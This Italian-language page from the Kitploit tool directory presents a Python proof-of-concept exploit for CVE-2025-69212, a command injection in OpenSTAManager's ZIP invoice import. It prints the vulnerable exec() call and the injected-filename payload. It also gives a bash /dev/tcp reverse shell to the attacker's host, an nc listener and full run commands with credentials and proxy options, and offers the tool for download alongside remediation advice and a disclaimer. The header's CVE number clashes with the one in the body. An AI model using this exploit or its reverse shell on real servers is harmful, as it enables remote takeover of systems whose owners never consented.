Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-69212 — PoC Python, exploit per CVE-2025-69212 | Kitploit
Strumenti/GitHubGitHub/c0gnit00/cve-2026-69212
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

PoC Python, exploit per CVE-2025-69212

Vedi Repository
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69212 — OpenSTAManager: Iniezione di comandi del sistema operativo (RCE)

Exploit proof-of-concept per CVE-2025-69212, una vulnerabilità di iniezione di comandi del sistema operativo in OpenSTAManager <= 2.9.8 che consente a un utente autenticato di eseguire codice in remoto tramite il caricamento di un file ZIP appositamente modificato.

Avviso

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • Versioni interessate: OpenSTAManager <= 2.9.8
  • Corretto in: OpenSTAManager 2.9.9+
  • CVSS: Critico

Dettagli della vulnerabilità

La vulnerabilità si trova in src/Util/XML.php alla riga ~100, dove l'applicazione passa un nome file controllato dall'utente direttamente in una chiamata shell exec() senza sanitizzazione:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

Quando un archivio ZIP viene caricato tramite il plugin importFE_ZIP (/actions.php), l'applicazione estrae il ZIP e passa il nome file di ogni voce .p7m a exec(). Un attaccante può creare un ZIP con un nome file malevolo che esce dall'argomento tra virgolette e inietta comandi shell arbitrari.

Payload di iniezione (nome file):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

Esecuzione shell risultante:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ iniettato qui

Nota: La barra / non può apparire direttamente nel nome file perché ZipArchive::extractTo() la tratta come separatore di percorso. Il PoC evita questo problema codificando in base64 il payload della reverse shell.


Requisiti

  • Python 3.x
  • Libreria requests
  • Credenziali valide di OpenSTAManager (qualsiasi ruolo con accesso al plugin di importazione)
  • Un listener sulla macchina dell'attaccante (es. nc)

Installa le dipendenze:

root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

Opzioni

Esempio

root@kitploit:~
# Avvia listener
nc -lvnp 4444

# Esegui exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Instradamento tramite Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

Come funziona

  1. Autenticazione — Effettua l'accesso a OpenSTAManager utilizzando le credenziali fornite
  2. Costruzione del payload — Costruisce un archivio ZIP contenente un file .p7m il cui nome file include il comando iniettato
  3. Codifica Base64 — La reverse shell (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) viene codificata in base64 per evitare le barre nel nome file
  4. Caricamento — Invia il ZIP tramite POST a /actions.php attraverso il plugin importFE_ZIP
  5. Esecuzione — Il server estrae il ZIP, passa il nome file malevolo a exec(), attivando la reverse shell
  6. Threading — Il caricamento viene eseguito in un thread demone poiché bash mantiene aperta la connessione HTTP; lo script termina correttamente senza attendere una risposta

Rimedio

Aggiornare a OpenSTAManager 2.9.9 o successivo, che sanifica i nomi file prima di passarli ai comandi shell.

Se non è possibile applicare immediatamente la patch, disabilitare il plugin importFE_ZIP o limitare l'accesso a /actions.php ai soli utenti fidati.


Avvertenza

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione scritta per i test. L'uso non autorizzato su sistemi che non possiedi è illegale e non etico. L'autore non è responsabile per eventuali usi impropri o danni causati da questo strumento.


Riferimenti

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
Scarica lo strumento
ArgomentoObbligatorioDescrizione
-u, --urlSìURL di base del target (es. http://target.htb)
-U, --usernameSìNome utente OpenSTAManager
-P, --passwordSìPassword OpenSTAManager
--lhostSìIl tuo indirizzo IP per la reverse shell
--lportSìLa tua porta in ascolto per la reverse shell
--proxyNoProxy HTTP (es. http://127.0.0.1:8080)